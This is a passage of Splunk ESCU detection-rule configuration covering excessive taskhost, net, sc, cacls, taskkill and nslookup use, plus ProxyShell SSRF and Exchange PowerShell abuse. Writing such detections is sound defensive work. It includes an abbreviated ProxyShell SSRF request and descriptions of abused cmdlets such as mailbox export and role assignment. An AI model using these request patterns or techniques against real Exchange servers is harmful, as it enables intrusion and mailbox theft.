[ESCU - Excessive number of taskhost processes - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection targets behaviors observed in post exploit kits like Meterpreter and Koadic that are run in memory. We have observed that these tools must invoke an excessive number of taskhost.exe and taskhostex.exe processes to complete various actions (discovery, lateral movement, etc.). It is extremely uncommon in the course of normal operations to see so many distinct taskhost and taskhostex processes running concurrently in a short time frame. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This detection targets behaviors observed in post exploit kits like Meterpreter and Koadic that are run in memory. We have observed that these tools must invoke an excessive number of taskhost.exe and taskhostex.exe processes to complete various actions (discovery, lateral movement, etc.). It is extremely uncommon in the course of normal operations to see so many distinct taskhost and taskhostex processes running concurrently in a short time frame. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators, administrative actions or certain applications may run many instances of taskhost and taskhostex concurrently. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive number of taskhost processes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Meterpreter"] action.risk = 1 action.risk.param._risk_message = An excessive amount of taskhost.exe and taskhostex.exe was executed on $dest$ indicative of suspicious behavior. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive number of taskhost processes - Rule action.correlationsearch.annotations = {"analytic_story": ["Meterpreter"], "cis20": ["CIS 10"], "confidence": 70, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process_id) as process_ids min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name = "taskhost.exe" OR Processes.process_name = "taskhostex.exe" BY Processes.dest Processes.process_name _time span=1h | `drop_dm_object_name(Processes)` | eval pid_count=mvcount(process_ids) | eval taskhost_count_=if(process_name == "taskhost.exe", pid_count, 0) | eval taskhostex_count_=if(process_name == "taskhostex.exe", pid_count, 0) | stats sum(taskhost_count_) as taskhost_count, sum(taskhostex_count_) as taskhostex_count by _time, dest, firstTime, lastTime | where taskhost_count > 10 and taskhostex_count > 10 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_number_of_taskhost_processes_filter` [ESCU - Excessive Service Stop Attempt - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies suspicious series of attempt to kill multiple services on a system using either `net.exe` or `sc.exe`. This technique is use by adversaries to terminate security services or other related services to continue there objective and evade detections. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies suspicious series of attempt to kill multiple services on a system using either `net.exe` or `sc.exe`. This technique is use by adversaries to terminate security services or other related services to continue there objective and evade detections. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Service Stop Attempt - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Ransomware", "BlackByte Ransomware"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to disable services. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Service Stop Attempt - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Ransomware", "BlackByte Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1489"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name = "sc.exe" OR Processes.process_name = "net1.exe" AND Processes.process="*stop*" OR Processes.process="*delete*" by Processes.process_name Processes.original_file_name Processes.parent_process_name Processes.dest Processes.user _time span=1m | where count >=5 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_service_stop_attempt_filter` [ESCU - Excessive Usage Of Cacls App - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies excessive usage of `cacls.exe`, `xcacls.exe` or `icacls.exe` application to change file or folder permission. This behavior is commonly seen where the adversary attempts to impair some users from deleting or accessing its malware components or artifact from the compromised system. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies excessive usage of `cacls.exe`, `xcacls.exe` or `icacls.exe` application to change file or folder permission. This behavior is commonly seen where the adversary attempts to impair some users from deleting or accessing its malware components or artifact from the compromised system. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or administrative scripts may use this application. Filter as needed. action.escu.creation_date = 2021-05-07 action.escu.modification_date = 2021-05-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of Cacls App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"] action.risk = 1 action.risk.param._risk_message = An excessive amount of $process_name$ was executed on $dest$ attempting to modify permissions. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of Cacls App - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1222"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id values(Processes.process_name) as process_name count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cacls.exe" OR Processes.process_name = "icacls.exe" OR Processes.process_name = "XCACLS.exe" by Processes.parent_process_name Processes.parent_process Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_cacls_app_filter` [ESCU - Excessive Usage Of Net App - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies excessive usage of `net.exe` or `net1.exe` within a bucket of time (1 minute). This behavior was seen in a Monero incident where the adversary attempts to create many users, delete and disable users as part of its malicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies excessive usage of `net.exe` or `net1.exe` within a bucket of time (1 minute). This behavior was seen in a Monero incident where the adversary attempts to create many users, delete and disable users as part of its malicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown. Filter as needed. Modify the time span as needed. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of Net App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware", "Graceful Wipe Out Attack", "XMRig", "Windows Post-Exploitation", "Azorult", "Ransomware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = Excessive usage of net1.exe or net.exe within 1m, with command line $process$ has been detected on $dest$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 28}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of Net App - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware", "Graceful Wipe Out Attack", "XMRig", "Windows Post-Exploitation", "Azorult", "Ransomware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_net_app_filter` [ESCU - Excessive Usage of NSLOOKUP App - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type (TXT, A, AAAA) that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect potential DNS exfiltration using nslookup application. This technique are seen in couple of malware and APT group to exfiltrated collected data in a infected machine or infected network. This detection is looking for unique use of nslookup where it tries to use specific record type (TXT, A, AAAA) that are commonly used by attacker and also the retry parameter which is designed to query C2 DNS multiple tries. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances of nslookup.exe may be used. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-06-03 action.escu.modification_date = 2022-06-03 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage of NSLOOKUP App - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"] action.risk = 1 action.risk.param._risk_message = Excessive usage of nslookup.exe has been detected on $dest$. This detection is triggered as as it violates the dynamic threshold action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage of NSLOOKUP App - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious DNS Traffic", "Dynamic DNS", "Data Exfiltration", "Command And Control"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1048"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode = 1 process_name = "nslookup.exe" | bucket _time span=1m | stats count as numNsLookup by dest, _time | eventstats avg(numNsLookup) as avgNsLookup, stdev(numNsLookup) as stdNsLookup, count as numSlots by dest | eval upperThreshold=(avgNsLookup + stdNsLookup *3) | eval isOutlier=if(numNsLookup > 20 and numNsLookup >= upperThreshold, 1, 0) | search isOutlier=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_nslookup_app_filter` [ESCU - Excessive Usage Of SC Service Utility - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious excessive usage of sc.exe in a host machine. This technique was seen in several ransomware , xmrig and other malware to create, modify, delete or disable a service may related to security application or to gain privilege escalation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search is to detect a suspicious excessive usage of sc.exe in a host machine. This technique was seen in several ransomware , xmrig and other malware to create, modify, delete or disable a service may related to security application or to gain privilege escalation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. Tune and filter known instances where renamed taskkill.exe may be used. action.escu.known_false_positives = excessive execution of sc.exe is quite suspicious since it can modify or execute app in high privilege permission. action.escu.creation_date = 2021-06-24 action.escu.modification_date = 2021-06-24 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of SC Service Utility - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Ransomware", "Azorult"] action.risk = 1 action.risk.param._risk_message = Excessive Usage Of SC Service Utility action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of SC Service Utility - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Azorult"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1569", "T1569.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode = 1 process_name = "sc.exe" | bucket _time span=15m | stats values(process) as process count as numScExe by dest, _time | eventstats avg(numScExe) as avgScExe, stdev(numScExe) as stdScExe, count as numSlots by dest | eval upperThreshold=(avgScExe + stdScExe *3) | eval isOutlier=if(avgScExe > 5 and avgScExe >= upperThreshold, 1, 0) | search isOutlier=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_sc_service_utility_filter` [ESCU - Excessive Usage Of Taskkill - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies excessive usage of `taskkill.exe` application. This application is commonly used by adversaries to evade detections by killing security product processes or even other processes to evade detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies excessive usage of `taskkill.exe` application. This application is commonly used by adversaries to evade detections by killing security product processes or even other processes to evade detection. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. Filter as needed. action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Excessive Usage Of Taskkill - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Azorult", "CISA AA22-264A", "AgentTesla", "CISA AA22-277A", "NjRAT"] action.risk = 1 action.risk.param._risk_message = Excessive usage of taskkill.exe with process id $process_id$ (more than 10 within 1m) has been detected on $dest$ with a parent process of $parent_process_name$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 28}, {"threat_object_field": "parent_process_name", "threat_object_type": "process"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Excessive Usage Of Taskkill - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Azorult", "CISA AA22-264A", "AgentTesla", "CISA AA22-277A", "NjRAT"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe" by Processes.parent_process_name Processes.process_name Processes.dest Processes.user _time span=1m | where count >=10 | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `excessive_usage_of_taskkill_filter` [ESCU - Exchange PowerShell Abuse via SSRF - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752 which utilizes the Web Datamodel. \ Modification of this analytic is requried to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated) \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752 which utilizes the Web Datamodel. \ Modification of this analytic is requried to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated) \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles. action.escu.how_to_implement = The following analytic requires on-premise Exchange to be logging to Splunk using the TA - https://splunkbase.splunk.com/app/3225. Ensure logs are parsed correctly, or tune the analytic for your environment. action.escu.known_false_positives = Limited false positives, however, tune as needed. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Exchange PowerShell Abuse via SSRF - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["ProxyShell", "BlackByte Ransomware", "ProxyNotShell"] action.risk = 1 action.risk.param._risk_message = Activity related to ProxyShell has been identified on $dest$. Review events and take action accordingly. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Exchange PowerShell Abuse via SSRF - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyShell", "BlackByte Ransomware", "ProxyNotShell"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Delivery", "Installation"], "mitre_attack": ["T1190", "T1133"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies suspicious behavior related to ProxyShell against on-premise Microsoft Exchange servers. This analytic has been replaced by GUID d436f9e7-0ee7-4a47-864b-6dea2c4e2752 which utilizes the Web Datamodel. \ Modification of this analytic is requried to ensure fields are mapped accordingly. \ A suspicious event will have `PowerShell`, the method `POST` and `autodiscover.json`. This is indicative of accessing PowerShell on the back end of Exchange with SSRF. \ An event will look similar to `POST /autodiscover/autodiscover.json a=dsxvu@fnsso.flq/powershell/?X-Rps-CAT=VgEAVAdXaW5kb3d...` (abbreviated) \ Review the source attempting to perform this activity against your environment. In addition, review PowerShell logs and access recently granted to Exchange roles. action.notable.param.rule_title = Exchange PowerShell Abuse via SSRF action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `exchange` c_uri="*//autodiscover*" cs_uri_query="*PowerShell*" cs_method="POST" | stats count min(_time) as firstTime max(_time) as lastTime by dest, cs_uri_query, cs_method, c_uri | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `exchange_powershell_abuse_via_ssrf_filter` [ESCU - Exchange PowerShell Module Usage - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PwSh Modules related to Exchange once gained access via ProxyShell or ProxyNotShell.\ Inherently, the usage of the modules is not malicious, but reviewing parallel processes, and user, of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting contents of a primary mailbox or archive to a .pst file. \ Module - New-managementroleassignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups). action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PwSh Modules related to Exchange once gained access via ProxyShell or ProxyNotShell.\ Inherently, the usage of the modules is not malicious, but reviewing parallel processes, and user, of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting contents of a primary mailbox or archive to a .pst file. \ Module - New-managementroleassignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled objects (for example, mailboxes, mail users, mail contacts, and distribution groups). action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators or power users may use this PowerShell commandlet for troubleshooting. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Exchange PowerShell Module Usage - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["ProxyNotShell", "CISA AA22-277A", "ProxyShell", "BlackByte Ransomware", "CISA AA22-264A"] action.risk = 1 action.risk.param._risk_message = Suspicious Exchange PowerShell module usaged was identified on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 32}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Exchange PowerShell Module Usage - Rule action.correlationsearch.annotations = {"analytic_story": ["ProxyNotShell", "CISA AA22-277A", "ProxyShell", "BlackByte Ransomware", "CISA AA22-264A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 40, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the usage of Exchange PowerShell modules that were recently used for a proof of concept related to ProxyShell. Adversaries may abuse a limited set of PwSh Modules related to Exchange once gained access via ProxyShell or ProxyNotShell.\ Inherently, the usage of the modules is not malicious, but reviewing parallel processes, and user, of the session will assist with determining the intent. \ Module - New-MailboxExportRequest will begin the process of exporting contents of a primary mailbox or archive to a .pst file. \ Module - New-managementroleassignment can assign a management role to a management role group, management role assignment policy, user, or universal security group (USG). \ Module - New-MailboxSearch cmdlet to create a mailbox search and either get an estimate of search results, place search results on In-Place Hold or copy them to a Discovery mailbox. You can also place all contents in a mailbox on hold by not specifying a search query, which accomplishes similar results as Litigation Hold. \ Module - Get-Recipient cmdlet to view existing recipient objects in your organization. This cmdlet returns all mail-enabled 